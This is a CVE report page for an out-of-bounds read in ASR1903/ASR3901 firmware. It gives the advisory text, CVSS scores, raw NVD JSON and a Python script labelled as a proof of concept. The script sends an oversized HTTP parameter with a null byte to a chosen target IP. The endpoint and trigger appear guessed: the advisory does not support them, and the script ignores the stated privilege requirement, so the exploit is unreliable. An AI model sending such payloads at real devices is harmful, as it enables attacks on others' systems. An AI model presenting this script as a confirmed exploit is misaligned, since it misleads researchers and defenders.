Security Vulnerability Report
CVE-2025-13735 CVSS 7.4 HIGH


Published: 2025-11-26 07:16:00
Last Modified: 2026-04-15 00:35:42
Source: 68630edc-a58c-4cbd-9b01-0e130455c8ae

Description

Out-of-bounds Read vulnerability in ASR1903, ASR3901 in ASR Lapwing_Linux on Linux (nr_fw modules). This vulnerability is associated with program files Code/nr_fw/DLP/src/NrCgi.C. This issue affects Lapwing_Linux: before 2025/11/26.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ASR Lapwing_Linux (nr_fw module) < 2025/11/26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13735 PoC - ASR ASR1903/ASR3901 Out-of-bounds Read
# Target: ASR1903/ASR3901 devices with nr_fw module
# Note: This PoC is for educational and security testing purposes only
import socket
import struct
import sys


def create_exploit_payload():
    """Generate malicious payload to trigger OOB read in NrCgi.C"""
    # HTTP GET request with oversized parameter
    # Target the NrCgi endpoint in nr_fw DLP module
    # Craft malicious HTTP request
    payload = b"GET /cgi-bin/nr_cgi?param="
    # OOB read trigger: oversized parameter (2000+ bytes)
    oob_data = b"A" * 2000
    # Add null byte to potentially trigger boundary condition
    payload += oob_data + b"\x00"
    payload += b" HTTP/1.1\r\n"
    payload += b"Host: target_device\r\n"
    payload += b"User-Agent: Mozilla/5.0\r\n"
    payload += b"Accept: */*\r\n"
    payload += b"Connection: close\r\n\r\n"
    return payload


def exploit_target(target_ip, target_port=80):
    """Send exploit payload to target device"""
    try:
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Generating exploit payload...")
        payload = create_exploit_payload()
        print(f"[*] Payload length: {len(payload)} bytes")
        print(f"[*] Connecting to target...")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        print(f"[*] Sending exploit payload...")
        sock.send(payload)
        print(f"[*] Receiving response...")
        try:
            response = sock.recv(4096)
            print(f"[*] Response received: {len(response)} bytes")
            print(f"[*] Response preview: {response[:200]}")
        except socket.timeout:
            print(f"[!] No response received (possible OOB read triggered)")
        sock.close()
        return True
    except Exception as e:
        print(f"[!] Error: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python CVE-2025-13735_poc.py <target_ip> [port]")
        sys.exit(1)
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print("=" * 60)
    print("CVE-2025-13735 PoC - ASR ASR1903/ASR3901 OOB Read")
    print("=" * 60)
    exploit_target(target_ip, target_port)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13735", "sourceIdentifier": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "published": "2025-11-26T07:16:00.173", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds Read vulnerability in ASR1903、ASR3901 in ASR Lapwing_Linux on Linux (nr_fw modules). This vulnerability is associated with program files Code/nr_fw/DLP/src/NrCgi.C.\n\nThis issue affects Lapwing_Linux: before 2025/11/26."}, {"lang": "es", "value": "Vulnerabilidad de lectura fuera de límites en ASR1903 y ASR3901 en ASR Lapwing_Linux en Linux (módulos nr_fw). Esta vulnerabilidad está asociada con los archivos de programa Code/nr_fw/DLP/src/NrCgi.C. Este problema afecta a Lapwing_Linux: antes del 26/11/2025."}], "metrics": {"cvssMetricV31": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}]}, "weaknesses": [{"source": "68630edc-a58c-4cbd-9b01-0e130455c8ae", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://www.asrmicro.com/en/goods/psirt?cid=41", "source": "68630edc-a58c-4cbd-9b01-0e130455c8ae"}]}}